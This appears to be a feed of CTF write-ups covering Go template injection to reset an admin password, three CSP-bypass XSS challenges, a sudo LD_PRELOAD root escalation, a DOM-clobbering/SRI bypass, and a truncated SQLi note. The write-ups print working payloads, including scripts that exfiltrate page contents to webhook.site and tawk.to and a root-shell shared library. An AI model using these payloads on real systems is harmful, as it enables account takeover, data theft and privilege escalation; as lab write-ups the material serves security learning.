DEV Community: pirateducky

SSTI Method Confusion in Go.

pirateducky — Fri, 04 Feb 2022 14:33:55 +0000

GoBlog

Summary

This is a write up for a CTF.

The application is vulnerable to SSTI method confusion, mentioned here. This means you can access methods available to the struct that is being passed in the templates, /web/ shows the templates that are being served and /models/ shows the functions that are being used. By abusing how templates work in golang we can access the ChangePassword method and change the admin's password allowing us to take over the admin account and access /admin

SSTI

The SSTI idea came from knowing the contents of /web/ which includes the admin template where the flag is referenced as {{.Flag}} and the rest of the templates for the blog.



admin.html.tmpl
base.html.tmpl
index.html.tmpl
new_post.html.tmpl
post.html.tmpl
profile.html.tmpl
signin.html.tmpl
signup.html.tmpl

The usual payloads to test SSTI do not work here, if you try to use something {{7*7}} the application will break, instead we can use {{.}} to see what data is being passed to template by changing the username to data: {{.}} in /profile after logging in. Here we get this information reflected in the username on the top right corner, we can also use the {{.CurrentUser}} object that is passed to the template to check out the data that's in there.



{
    38e367f9-6065-4717-87bf-5fd938589b8f 
    {{.CurrentUser}}  
    09d8d7b2345e48f3dbe42d81883b9cf4a5d2de2264929c0a99d0957fcfba3d697b30bf4b5b3c0218f211a037446fbda831949d46d9a15cc30e503a63474ec4e5 
    duck@gmail.com false 2021-09-18 18:37:39.851096876 +0000 UTC 
    2021-09-18 19:04:01.69805924 +0000 UTC
}

Confused

If we look at /models/ this is where the application holds logic that interacts with the database, the most interesting functions are in /models/users.go, which has functions that we can execute with our SSTI, but only a few where we can pass arguments and have the needed data structures available for the rest of the parameters. The function I wanted to invoke was the Create() function in the users.go but it doesn't take any arguments and uses the data structure passed to the template. The other interesting function that would allow me to pass arguments is the ChangePassword(newPassword string) but if we call it like {{.CurrentUser.ChangePassword "duck"}} it would change our own password which is cool but it would be cooler if we could change congon4tor's password instead. The problem is the data structure that we are passing while in the /profile template contains our own details.

The /profile template file includes the data structure CurrentUser which has all the information for our current user and is what we can use to access the other methods inside of users.go the data in that structure is what fills the parameters in the functions we want to hijack.



 // template for /profile
{{define "styles"}}
  <style></style>
{{ end }}
{{define "content"}}
    <div class="container">
      <div class="row">
        <div class="jumbotron mt-5">
            <form action="/profile" method="post">
                <div class="mb-3">
                    <label for="exampleFormControlInput1" class="form-label">Username</label>
                    <input type="text" class="form-control" id="exampleFormControlInput1" placeholder="Username" name="username"  value="{{.CurrentUser.Username}}">
                </div>
                <div class="mb-3">
                    <label for="exampleFormControlInput2" class="form-label">Email</label>
                    <input type="text" class="form-control" id="exampleFormControlInput2" placeholder="Email" readonly value="{{.CurrentUser.Email}}">
                </div>
                <button type="submit" class="btn btn-primary">Submit</button>
            </form>
        </div>
      </div>
    </div>
{{end}}

We need to somehow get the data structure to show congon4tor's information, if we use our {{.}} payload we can check if any page discloses that information, here I used the original blog post that was there when we sign in, if we access the post from the admin we can see the data structure is from the congon4tor user, which is what we need.



{[{
    5e6ef653-0f54-4e0b-b9dd-c5898bcfb20a 
    {
        608a3505-2fa9-46b6-b149-e085f3f2e85b 
        congon4tor  
        1ebbab4803520862d1a5ba5bcc192643e03562c0a59a0b48911336e0c07e0a4ad8d4710b385935a35c176bb29c847281ba75721c849105f37d24b8e934c3a1ac congo@congon4tor.com 
        false 
        2021-07-24 13:26:01.837939032 +0200 +0200 
        2021-07-24 13:26:01.837938977 +0200 +0200
    } 
    Welcome to GoBlog Welcome to GoBlog a website where you can post all your travel adventures for others to enjoy. Talk about the places you visited, the food you tried, the people you met and the culture of the place you visited. It is also a good idea to give others some tips and tricks you learnt during your trip.
    Thanks for sharing with the community!  
    https://www.bloggingwp.com/wp-content/uploads/2018/01/Travel-blog.jpeg 
    2021-07-24 13:42:53.033357338 +0200 +0200 
    2021-07-24 13:42:53.033357391 +0200 +0200
}]}

But how can we access the ChangePassword function from the post's page thought? If we try to use the same payload as before {{.CurrentUser.ChangePassword "duck"}} and then go to the post url [http://challenge.ctf.games:31814/post/5e6ef653-0f54-4e0b-b9dd-c5898bcfb20a](http://challenge.ctf.games:31814/post/5e6ef653-0f54-4e0b-b9dd-c5898bcfb20a) the application will break because we do not have {{.CurrentUser}} in our /post template:



{{define "content"}}
        <header class="masthead" style="background-image: url('{{.Post.Thumbnail}}')">
            <div class="tint">
                <div class="container position-relative px-4 px-lg-5">
                    <div class="row gx-4 gx-lg-5 justify-content-center">
                        <div class="col-md-10 col-lg-8 col-xl-7">
                            <div class="post-heading mt-3">
                                <h1>{{.Post.Title}}</h1>
                                <span class="meta">
                                    Posted by
                                    {{.Post.Author.Username}}
                                    on {{.Post.UpdatedAt.Format "02 Jan 06 15:04"}}
                                </span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <div class="container px-4 px-lg-5">
            <div class="row gx-4 gx-lg-5 justify-content-center">
                <div class="col-md-10 col-lg-8 col-xl-7">
                    <pre class="content">{{.Post.Content}}</pre>
                </div>
            </div>
        </div>
{{end}}

But we do have access to {{.Post}} which discloses information from the author, the object contains all the information we need to for the ChangePassword function. Now how can we access the method we need? We can do it by calling it directly from the author struct, this is possible because the author struct being used here is our Users struct which contains the ChangePassword function we need, and the data being passed in this post wil fill the parameters with the admin's details



func (u User) ChangePassword(newPassword string) error {
    db := GetConnection()
    q := `UPDATE users set hashed_password=?
            WHERE id=?`
    stmt, err := db.Prepare(q)
    if err != nil {
        return err
    }
    defer stmt.Close()

    h := sha512.New()
    h.Write([]byte(newPassword))
// this will be the admins ID when we visit the blog's page
    r, err := stmt.Exec(hex.EncodeToString(h.Sum(nil)), u.ID)
    if err != nil {
        return err
    }

    if i, err := r.RowsAffected(); err != nil || i != 1 {
        return errors.New("ERROR: Expected one row modified")
    }

    return nil
}

Now with that information, we'll need to:

Change our username to our payload: {{.Post.Author.ChangePassword "duck"}}
Navigate to congon4tor's blog post
1. http://challenge.ctf.games:31737/post/5e6ef653-0f54-4e0b-b9dd-c5898bcfb20a
2. At this point the password has been changed but you need the email address to login
Get congon4tor email by setting our username to {{.Post.Author.Email}}
Navigate to congon4tor's blog post again (email should be on the top right hand side)

Sign into congon4tor's account using:

email: congo@congon4tor.com

password: duck
Access /admin

CSP Porfavor

pirateducky — Sat, 06 Nov 2021 19:52:45 +0000

CSP Challenges

Thanks to ajxchapman for creating https://bughuntr.io where these challenges are from.

What is CSP?

Content-Security-Policy can be used to prevent and detect content injection attacks such as xss, it can be set as a response header or a meta tag, but it should not be used as the only way to prevent these attacks as it can be easily bypassed when misconfigured. A good tool to check a CSP policy is google's CSP validator which allows you to copy and paste a policy and check for dangerous misconfigurations.

CSP Challenges one, two and three use the same application each with a more strict csp:

The application is a ticketing system where the user can submit tickets and a bot responds to those and closes them, the bot only interacts with the ticket once and that is to cancel the ticket. Our flag is shown in the list of tickets with an open book icon next to it, meaning it is still opened, however we do not have access to this ticket and if we try to view it we get a 403 error

Challenge Uno

In this first challenge we can inject some html into the ticket's comments by sending our payload in the ticket comment section in the name field, after we create a ticket.

csrfmiddlewaretoken=LiM4kODGhMxB0RIkXXzxlfv5qR9mLSBv8XOT85LpubTz4YlzJ2NhPVGOGY3Rc9b0
&creator='/><h1>testing injection</h1>
&body=test

We can also see that a bot(ticketbot) visits our ticket and closes it, this is important because the bot can probably see everyone's tickets including the one with our flag which right now we can't see. The bot only views our ticket once, after it closes our ticket it will not view our ticket again.

That same behavior will be consistent through all three challenges.

The CSP policy is in all responses as a header:

Content-Security-Policy default-src *; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net *.tawk.to; style-src 'self' https://cdn.jsdelivr.net *.tawk.to

Let's paste it in google's CSP validator

unsafe-inline should stick out here, as well as the cdn but the unsafe-inline allows us to use an inline script tag to execute JavaScript.

Now let's try to run some JavaScript to build our payload! We should be able to execute something like an alert to prove that idea.

Great now, how can trick the ticketbot into giving us the flag?

My idea is as follows:

Make the ticketbot visit the ticket where our flag is located
Take the html from the page and get it out to somewhere we control

This applies in all three scenarios

We can build our payload by using it on ourselves first, we'll write some JavaScript which will fetch the page where the flag is and send it's contents to a server we control, I like using webhook.site for CTF's to do stuff like this.

We can send the data over to webhook by creating an image tag which we'll append to the body of the page, we give this image a src where the value is a server we control and append the data as a parameter(sending a post message is probably better but I like the image tag).

I'm using fetch to make the requests which will return the response's body as text and that will then be sent with my image request in a parameter.


// this is where the flag is
// we should receive the html 
// content of the page which says 
// we do not have access to that page

"'/><script>
fetch("/view/<ticket>").
then(res => res.text()).
then((data) => {    
  var img = document.createElement("img");
  img.src="https://webhook.site/dca2f591-eb3a-47f9-8f5f-c5c2d1c0116d/a.png?data="+data;
  document.body.appendChild(img); 
})
</script>

Now let's send this as our payload which goes in the comment section once you create a ticket, and we should see a callback in our webhook:

This works on us but if we try it against the ticketbot you'll find out it never triggers a request, after trying to figure out why I thought about checking what the URL of the current page is to see if that worked, this would allow me to get some information on where the ticketbot is coming from to know where my attack need to be directed to.

"'/><script>
// our payload grabs the URL value of
// the current page
  var img = document.createElement("img");
  img.src="https://webhook.site/dca2f591-eb3a-47f9-8f5f-c5c2d1c0116d/a.png?data="+window.location.href;
  document.body.appendChild(img); 
</script>

After getting our own request we should get one from the ticketbot, showing the URL it's visiting from, this gives us more information for our attack:

We need to make the request to http://127.0.0.1:9000/view/<ticket>

Our new payload will be:

"'/><script>
fetch("http://127.0.0.1:9000/view/<ticket>").
then(res => res.text()).
then((data) => {    
  var img = document.createElement("img");
  img.src="https://webhook.site/dca2f591-eb3a-47f9-8f5f-c5c2d1c0116d/a.png?data="+data;
  document.body.appendChild(img); 
})
</script>

This will trigger an error for us but the bot should be able to make that request for us. The original payload didn't work because I was making the request to port 80 where that page didn't exist.

The next scenario can follow the same path to exploitation, but the CSP is a bit different as the unsafe-inline is removed.

CSP Dos

In the next challenge our changelog states:

Content-Security-Policy restricted to prevent execution of unauthorized javascript.

And if we check out CSP policy and paste in google's CSP validator we can see that unsafe-inline has been removed from the script-src list, but the cdn is still available.

Content-Security-Policy default-src *; script-src 'self' https://cdn.jsdelivr.net *.tawk.to; object-src 'self'; style-src 'self' https://cdn.jsdelivr.net *.tawk.to

With this CSP we are not allowed to execute inline JavaScript so we have to rely on the domains that have been allowed by the developers. In this case https://www.jsdelivr.com/ is a CDN that has a really cool feature, it allows us to serve JavaScript from a github repo. Using this we can host some malicious JavaScript that will do the same thing as the last challenge and send it somewhere we control.

I used this https://github.com/nerdyamigo/cdnxss/blob/main/xss-poc.js which can be served from the cdn that's allowed to execute scripts, just paste a link to the code you want to serve from github and grab the link from https://www.jsdelivr.com/github.

fetch("http://127.0.0.1:9000/view/<ticket>").then((res) => {
    return res.text();
}).then(data => {
    fetch("https://webhook.site/dca2f591-eb3a-47f9-8f5f-c5c2d1c0116d/a.png?data="+data);
})

Served from https://cdn.jsdelivr.net/gh/nerdyamigo/cdnxss@main/xss-poc.js

Our payload this time is using an external script that is allowed to execute JavaScript.

'/><script src="https://cdn.jsdelivr.net/gh/nerdyamigo/cdnxss@main/xss-poc.js"></script>

Using this we will again see a failed request on our side but the ticketbot should be able to view page we requested and send us our flag.

The next challenge is a bit different and using the cdn can work but connections outside the allowed ones are not allowed, however we do have one more source where connections are allowed.

CSP Tres

Changelog:

Further Content-Security-Policy update to limit javascript interactions to only specifically permitted endpoints.
Content-Security-Policy restricted to prevent execution of unauthorized javascript.

As in the previous challenges we'll start with checking the CSP header.

Content-Security-Policy default-src 'none'; script-src 'self' https://cdn.jsdelivr.net *.tawk.to; object-src 'self'; style-src 'self' https://cdn.jsdelivr.net *.tawk.to; img-src 'self' *.tawk.to; media-src 'self'; frame-src 'self'; font-src 'self'; connect-src 'self' *.tawk.to wss://*.tawk.to

Here we see that the only thing being called out is the cdn, we can still execute from there but we can't make any callbacks to our server because of the connect-src directive, which explicitly states what we can cam make requests out to.

connect-src 'self' *.tawk.to wss://*.tawk.to

The interesting part here is the domain tawk.to - this is a service that allows you to have a chat popup in your application, by only adding some javascript, this domain is also in our script-src, so it's allowed to run JavaScript.

Looking at the service, and the documentation here, I tried opening the chat by going to the dev console in the browser and using:

window.Tawk_API.popup();

Awesome, we can open the popup, but now what?

Tawk.to is free to use, so we can signup for an account and get our own chat. Because our injection still exists, we can use the cdn to load the tawk script for our chat and execute it from there.

I did it this way so I could also perform the exploit right after my chat was loaded.

Using this I was able to load a chat I controlled on the page, I spent a lot of time trying to figure out how to send the html that had the flag to somewhere I controlled, the only option was to send it tawk.to and somehow retrieve it. I tried to use websockets to send it to the open chat but that didn't work, so I hit up Alex and asked about my approach - he mentioned uploads and I started playing with that.

There's a few things I found out about how the chat functionality works that will help explain how to exploit it to send our data to somewhere we can control.

You can view chats in your tawk.to dashboard
The client and you can upload files
The client uploads sends a post to https://upload.tawk.to/upload/visitor-chat/visitor?handle=0c47125a3139b11ae32bd67965c9a0f461d1c92c&visitorSessionId=61860b2ece40c32e3e38daad
When you upload something from the dashboard it goes to https://upload.tawk.to/upload/page/agent?handle=097401fa71979d51c80167449a189a134b20a19b&pageId=61830caa6bb0760a494106d7&agentSessionId=6185ddfe69d9e2

I tried uploading to the /visitor endpoint but I could only upload once and then would get 500 errors on any subsequent POST to that endpoint. The agent however can upload to the /upload/page/agent route as many times as possible and the files can be retrieved by checking the response and grabbing the url that is provided for the file:

https://tawk.link/61830caa6bb0760a494106d7/a/61830c9a69d9e20b02e41112/097401fa71979d51c80167449a189a134b20a19b/test2

Any file posted while the chat is going on can be reached by its filename using the route that is provided for this chat. To get the route send an attachment to an active chat from the tawk.to dashboard and grab the URL to the file, since we control the filename and it doesn't change we can visit the file we created with the contents of the ticket with the flag.

So now what?

Here is my idea:

Make the bot view the ticket with the flag
Steal the contents of the flag
Somehow put the contents in a file and upload it to the chat we have opened using the /agent/ route.

All this can be done all in JavaScript, hosted on github and served from the cdn that is allowed.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/61830caa6bb0760a494106d7/1fjjuiusl';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);

})();

fetch("http://127.0.0.1:9000/view/f1135719-d3a5-4534-9bc1-f7ddcf4c8cb3").then((res) => {
    return res.text();
}).then(data => {
    var formData = new FormData();
    var file = new File([data], "flag2.txt", {
    type: "text/plain",
});

formData.append("upload", file);

fetch("https://upload.tawk.to/upload/page/agent?handle=8194642e04cf8530ca49d5432a72ffc1d06c3569&pageId=61830caa6bb0760a494106d7&agentSessionId=61855f3369d9e20b02eb53da",{
        method: 'POST',
        body: formData
    });

})

Our final payload would be:
'/><script src="https://cdn.jsdelivr.net/gh/nerdyamigo/cdnxss@main/testcsrfpost11/flagplz7.js"></script>

Which when the bot visits before closing our ticket will send us the file with the html contents.

This last challenge was a lot of fun to solve.

bank on it

pirateducky — Mon, 15 Mar 2021 07:28:38 +0000

To log into the box use the ssh keys found here

I had a lot of fun doing the NahamConCTF, thanks everyone who was involved. This is a small writeup for the Bank on it challenge.

Summary:
The current user can execute the /opt/banking/bank binary using sudo, however the SETENV option is enabled, which helps persist environment variables when using sudo since it starts a session, with that we can use LD_PRELOAD to load a malicious function and get a shell as root.

Credit to: https://sumit-ghosh.com/articles/hijacking-library-functions-code-injection-ld-preload/

Find out if the user can run anything as root we can use sudo -l , it appears that they can run the /op/banking/bank binary as root, with no password, we also see the SETENV which will come in handy later.

$ sudo -l
Matching Defaults entries for gus on banking-on-it-88199b44846b0f72-65bbbf7d6c-82b95:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User gus may run the following commands on banking-on-it-88199b44846b0f72-65bbbf7d6c-82b95:
    (root) SETENV: NOPASSWD: /opt/banking/bank

SETENV is dangerous, it allows us to persist environment variables when using sudo.

Since SETENV is specified in the sudoers file we can use this to load an environment variable that will allow us to hijack where shared libraries are used first - and although we could hijack one of the functions being used directly in the binary to make sure this works we'll be hijacking the _init function, more info here.

#include <unistd.h>

void _init() {
    char *argv[] = {"/bin/sh", 0};
    execve(argv[0], &argv[0], NULL);
}

We'll name this shlib.c and now compile it like

gcc -shared -fpic -nostartfiles shlib.c -o [shlib.so](http://shlib.so)

You should now have a [shlib.so](http://shlib.so) file which we'll be using to hijack the _init function in the binary.

Now let's use LD_PRELOAD

The LD_PRELOAD trick exploits functionality provided by the dynamic linker on Unix systems that allows you to tell the linker to bind symbols provided by a certain shared library before other libraries.

http://www.goldsborough.me/c/low-level/kernel/2016/08/29/16-48-53-the_-ld_preload-_trick/
If you set LD_PRELOAD to the path of a shared object, that file will be loaded before any other library (including the C runtime, libc.so).

https://stackoverflow.com/questions/426230/what-is-the-ld-preload-trick

Let's execute the binary like this:

sudo LD_PRELOAD=/home/gus/shlib.so /opt/banking/bank

And we are now root!

wacky

pirateducky — Tue, 10 Nov 2020 04:03:12 +0000

Objectives:

You must alert(origin) showing https://wacky.buggywebsite.com
You must bypass CSP
It must be reproducible using the latest version of Chrome
You must provide a working proof-of-concept on bugpoc.com

Summary:

Bypassed access restrictions to /frame.html which allowed me to inject and render html, bypassed csp using the <base> element to execute a remote javascript file, bypassed the integrity check and broke out of the iframe's sandbox to execute alert(origin) which was not possible due to the sandbox attribute given to the iframe we end up in.

Thank you for the challenge - hope everyone likes this writeup, there is a visualization for the exploits you can check out after reading this.

Exploit

bucpoc exploit: jGQnU5oH (works on latest Chrome version)

bugpoc password: SociAlcRAne15

This is the bugpoc.com payload:

<!-- Front-End BugPoC -->

<html>
    <!-- TODO implement -->
  <h1>NOTHING TO SEE HERE</h1>
</html>

<script>
window.open("https://wacky.buggywebsite.com/frame.html?param=%3C/title%3E%3Cbase%20href=%27https://4d46opa6bb58.redir.bugpoc.ninja%27%3E%3Ca%20id=fileIntegrity%3E%3Ca%20id=fileIntegrity%20name=value%20href=nah%3E", "iframe")
</script>

Technical Details

The following sections will walk through the technical details on each part of the challenge. Enjoy

initial foothold
csp but make it vulnerable
integrity || GTFO
- bypass
it's clobberin time
the great escape
poc diy

Initial foothold

The challenge is at https://wacky.buggywebsite.com/ which loads an application that gets user input and turns it into "wacky text". This is implemented by loading an iframe from /frame.html which is where the code for turning the normal text into wacky text is located. It is also important to mention that this iframe has a sort of access control which "protects" it from being loaded directly from the browser:

Back in / we can see the html source and see the iframe being loaded correctly

...
<div class="round-div">
    <span style="opacity:.5">Enter Boring Text:</span>
    <br>
    <textarea id="txt">Hello, World!</textarea>
    <div style="text-align: center;">
    <button id="btn">Make Whacky!</button>
    </div>
    <br>
    <iframe src="frame.html?param=Hello, World!" name="iframe" id="theIframe"></iframe>
</div>
...

The access control is implemented in the script loaded inside /frame.html . The code below shows the "verification" that determines if the iframe we are interested in can be loaded

// this checks the window name before dynamically generating the iframe we need
if (window.name == 'iframe') {

    // securely load the frame analytics code
    // this just need to eval to true (the actual value doesn't matter)
    if (fileIntegrity.value) {

    // create a sandboxed iframe
    analyticsFrame = document.createElement('iframe');
    analyticsFrame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
    analyticsFrame.setAttribute('class', 'invisible');
    document.body.appendChild(analyticsFrame);

}

The script checks the window.name to see if it's called iframe and if it is - it continues execution, if the name does not match the iframe does not get created. This is interesting, since the window.name can be set when opening a window from an arbitrary domain using window.open("https://evilwebsite.com", "nameforwindow") , with this we should be able to open the frame.html

<html>
<!-- put this in a server you control -->
<body>
<!-- this will open the site given it the window.name='iframe' that we need -->
<script>window.open("https://wacky.buggywebsite.com/frame.html?param=hello", "iframe")</script>
</body>
</html>

Now that we have access to this file we can pass it what we want using the query string param=somethig. This is good for us since our input is going directly into the page, if you check where the input is being reflected you'll notice you can close the <title> tag using: /frame.html?param=</title> now everything after that will be valid html and we can continue to try to get our alert.

CSP

Even though html is injectable, all interesting elements get blocked because of the CSP

I use https://csp-evaluator.withgoogle.com to see if there is anything interesting anytime I see a CSP policy (it helped that the challenge mentioned a CSP bypass)

content-security-policy: script-src 'nonce-hafjcerljbyi' 'strict-dynamic'; frame-src 'self'; object-src 'none';

The one that stuck out was base-uri [missing] when looking at MDN we can see the following:

base-uri directive restricts the URLs which can be used in a document's element. If this value is absent, then any URI is allowed. If this directive is absent, the user agent will use the value in the element

Now let's look at the MDN page for the element:

Links pointing to a fragment in the document — e.g. <a href="#some-id"> — are resolved with the <base>, triggering an HTTP request to the base URL with the fragment attached. For example:
Given <base href="https://example.com">
...and this link: <a href="#anchor">Anker</a>
...the link points to https://example.com/#anchor

Let's go back to the /frame.html?parameter=</title> and look for something interesting in the rendered html

This iframe caught my eye because it gets built dynamically by:

<script nonce="jllvokubhfmz">

        window.fileIntegrity = window.fileIntegrity || {
            'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',
            'algorithm' : 'sha256',
            'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
            'creationtime' : 1602687229
        }

        // verify we are in an iframe
        if (window.name == 'iframe') {

            // securely load the frame analytics code
            if (fileIntegrity.value) {

                // create a sandboxed iframe
                analyticsFrame = document.createElement('iframe');
                analyticsFrame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
                analyticsFrame.setAttribute('class', 'invisible');
                document.body.appendChild(analyticsFrame);

                // securely add the analytics code into iframe
                script = document.createElement('script');
                script.setAttribute('src', 'files/analytics/js/frame-analytics.js');
                script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);
                script.setAttribute('crossorigin', 'anonymous');
                analyticsFrame.contentDocument.body.appendChild(script);

            }

        } else {
            document.body.innerHTML = `
            <h1>Error</h1>
            <h2>This page can only be viewed from an iframe.</h2>
            <video width="400" controls>
                <source src="movie.mp4" type="video/mp4">
            </video>`
        }

    </script>

The code above shows how the iframe and script are built, the one that's interesting is script.setAttribute('src', 'files/analytics/js/frame-analytics.js'); which sets the src attribute, this path is relative, and how do relative paths determine where to resolve? base-uri which can be set by adding a <base href='https://evildomain.com> element:

payload: https://wacky.buggywebsite.com/frame.html?param=</title><base href="https://evildomain.com">

This will allow us to include a file from an arbitrary domain we control - since after we inject our <base> element the file will actually be fetched from https://evildomain.com/files/analytics/js/frame-analytics.js giving us a way to inject arbitrary javascript.

Integrity - nah

Now that we know we can trick the application to load a file from a source we control, we can load our file and be done right? Unfortunately if we try to do this - the request will fail, this is because of the integrity attribute that's added in this line script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);

Before we go into how to get around that, let's see what this integrity thing is, from the RFC provided by the source script

An author wants to include JavaScript provided by a third-party analytics service. To ensure that only the code that has been carefully reviewed is executed, the author generates integrity metadata for the script, and adds it to the script element

This is what's happening here - the script that is being loaded doesn't pass the integrity check and fails to load, so this is where I was stuck for a while.

The bypass here is to get the hash value to give us a parsing error, which is done by sending anything that isn't valid base64 as the integrity value, we also have to make sure we return the ACAO header with * to fulfill the requirements from the RFC

This allows us to get our script to load and execute.

Heard you like backwards compatibility?

This section explains the SRI bypass I found which allows me to use any script without having to provide a valid hash by producing a parser error.

I was a bit confused here for a bit, even after solving the challenge. Why is the script still loaded? Why was I still getting a console error? I wanted answers. So I did some digging.

The error we get after clobbering the fileIntegrity(more on this later) object is a bit different, if you don't clobber the fileIntegrity object you get this error when trying to load the resource from your server:

"Failed to find a valid digest in the 'integrity' attribute for resource '" + resourceUrl + "' with computed SHA-256 integrity '" + digest + "'. The resource has been blocked."

Which blocks our source from being loaded.

But after you clobber the fileIntegrity object, the error simply says:

Error parsing 'integrity' attribute ('" + attribute + "'). The digest must be a valid, base64-encoded value."

And our script still loads:

That distinction[the difference in error message] makes all the difference, looking at how the parser error is generated from the source: SubresourceIntegrity.cpp

The browser couldn't parse the hash value because it's not valid base64, by looking at which if statement causes the error we can see that in our case we do get the error message but our script is allowed in and execution continues, and by looking at the comments it's clear that the
reason why this happens is for backwards compatibility:

Here is a resource being blocked due to an integrity check:

Now how do we generate this parsing error?

Thanks https://twitter.com/acut3hack for the nudge for this next part.

DOM Clobbering

Let's do a recap of what has brought us here.

We can load an iframe that takes in user input un-sanitized /frame.html?param=dirtydata
- achieved by using window.open("domain", "windowname")
There is a csp in place
- csp can be bypassed by injecting <base href=https://evildomain.com> with our current injection
- The <base> element sets the domain for assets that come from relative paths()
The script that is being dynamically built is now being loaded from https://evildomain.com/files/analytics/js/frame-analytics.js
- This means we can control what's inside frame-analytics.js
The file is being prevented from executing because of the integrity check 😢
- The bypass involves changing the value of the hash to get a parsing error which will raise an error but allow the script to load
  - Currently the hash is stored in a global object fileIntegrity.value

The first interesting thing to notice is how the integrity attribute is being generated:

window.fileIntegrity = window.fileIntegrity || {
'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',
'algorithm' : 'sha256',
'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
'creationtime' : 1602687229
}
...

script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);
...

The value for the integrity attribute is stored in the fileIntegrity.value object which can be accessed globally. The browser works in mysterious ways...because we can use the html injection we currently have to "clobber" the value and replace with something we can control. 🤯

Because of how the browser treats elements with id attributes, we can "clobber" the fileIntegrity object and store arbitrary data in it, which means we can create our invalid sha256 hash which will produce the error we need

We can cause this almost mystical attack by using the following payload

/frame.html?param=</title><base href="https://evildomain.com"><a id=fileIntegrity><a id=fileIntegrity name=value href=quack>

That will allow us to completely reset the global object fileIntegrity and set the arbitrary value we need fileIntegrity.value so it can cause the parsing error, and the file we have hosted on https://evildomain.com/files/analytics/js/frame-analytics.js will actually get loaded and it will execute in our context.

iframe

I went for it here - I hosted the file and used alert(1) and when I went to execute....nothing.

Turns out the sandbox attribute that was added to the parent iframe prevents us from using any prompts like alert prompt etc by using this value "allow-scripts allow-same-origin" it will only allow us to execute scripts 😭

On to MDN we go again to find the following:

This is interesting - it shows that the attribute values we currently have can be misused and possibly lead to unexpected behavior.

My first idea was to remove the attribute itself from the parent iframe by using the script we currently control, that means that the contents of my frame-analytics.js would have to:

Find the iframe that we are interested in
Remove sandbox attribute by using Element.removeAttribute(attributeName)
Pop my alert and be on my way right?

In short - no, it's not that easy to trick the browser into letting us pop alerts, after you remove the attribute and it's values the browser will still complain that we aren't being safe and will fallback to that same sandbox and after some google-fu I stumbled onto this beautiful blogpost https://danieldusek.com/escaping-improperly-sandboxed-iframes.html which goes into more detail into what's going on. Since we can run js let's completely remove the "safe" iframe and replace it with a much nicer, trusting one. We'll also use the same trick to get a parsing error for the script we are going to use which will contain our final alert

// find the iframe with the sandbox
var og = parent.document.getElementsByTagName('iframe')[0];
// create a nicer iframe :yay
var hack = document.createElement('iframe');
// append out nicer iframe to the body
parent.document.body.append(hack);
// remove the mean iframe
og.parentNode.removeChild(og)

// create a script tag
script = document.createElement('script');
// I used bugpocs mock endpoint & flexible redirector to also load this
// it only contais alert(origin)
script.setAttribute('src', 'https://gfeku9odpbh4.redir.bugpoc.ninja');
// integrity parser error so our script loads
script.setAttribute('integrity', 'sha256-http://evildomain.com/nah')
// cors settings
script.setAttribute('crossorigin', 'anonymous');
// add the script which will pop our alert 
hack.contentDocument.body.appendChild(script);

This right here does the job, it accomplishes all the requirements above and allows us to execute our alert with no restrictions.

BugPoc

Initially this was made using aws, but when solving it, I got this:

And it made me want to do it, so here I'll explain how I achieved this.

Using bugpoc's mock endpoint I created an endpoint that would load the initial script needed:

https://mock.bugpoc.ninja/blahhh/m?sig=e186e17016d4331acbb13ee8f399ff0b8d53bdeb4ca6d84f039a499a6e8d240e
&statusCode=200&headers={"Access-Control-Allow-Origin":"*","Content-Type":"application/javascript"}
&body=
var og = parent.document.getElementsByTagName('iframe')[0];
var hack = document.createElement('iframe');

parent.document.body.append(hack);
og.parentNode.removeChild(og)

script = document.createElement('script');
script.setAttribute('src', 'https://blahhh.redir.bugpoc.ninja');
script.setAttribute('integrity', 'sha256-http://evildomain.com/nah')
script.setAttribute('crossorigin', 'anonymous');
hack.contentDocument.body.appendChild(script);

Then I used the Flexible Redirector to create a redirect that would load this when it got hit from:

https://blahh.redir.bugpoc.ninja/files/analytics/js/frame-analytics.js

The next step is generating the script that will load the alert(origin) that will eventually pop without any restrictions, using the fact that generating a parser error will allow us to load any file regardless of it's hash we can load a script with the alert we need.

Create another endpoint like this

https://mock.bugpoc.ninja/blahh/m?sig=2ab43ab3a0ed597f35060df005eaab7f38ecc167799ac3b853362fc8624953cc&statusCode=200&
headers={"Access-Control-Allow-Origin":"*","Content-Type":"application/javascript"}&
body=alert(origin)

And create a flexible redirect to this that will load the script:

script.setAttribute('src', 'https://blahhh.redir.bugpoc.ninja');

Tying all that together you can then create a PoC and add the payload:

bucpoc exploit: jGQnU5oH (works on latest Chrome version)

bugpoc password: SociAlcRAne15

That creates a PoC entirely using bugpoc.com which is honestly pretty cool.

Thanks for the challenge!

Resources

https://google.com

https://www.acunetix.com/blog/articles/finding-source-dom-based-xss-vulnerability-acunetix-wvs/

https://danieldusek.com/escaping-improperly-sandboxed-iframes.html

https://report-uri.com/home/sri_hash

https://portswigger.net/research/dom-clobbering-strikes-back

https://developer.mozilla.org

https://csp-evaluator.withgoogle.com/

https://medium.com/@terjanq/dom-clobbering-techniques-8443547ebe94!

Photo Gallery

pirateducky — Fri, 07 Aug 2020 02:00:47 +0000

These are my notes from the hacker101 CTF which is here. Slightly edited but mostly raw notes

Challenge: Photo Gallery

Flag0: SQLi

I had to craft a union that took in a wrong id and then executed a union where I passed down the path to main.py which is where everything happens.

First we are given in the hints that this is a docker image, which is documented here:
https://github.com/tiangolo/uwsgi-nginx-flask-docker

Then by looking at the app, in order to grab the images from the server the following is used fetch?id=1
This is an indication that we should test for a SQLi, by using the hints we can see that this will require a UNION

We have look at how the UNION command works in SQL:
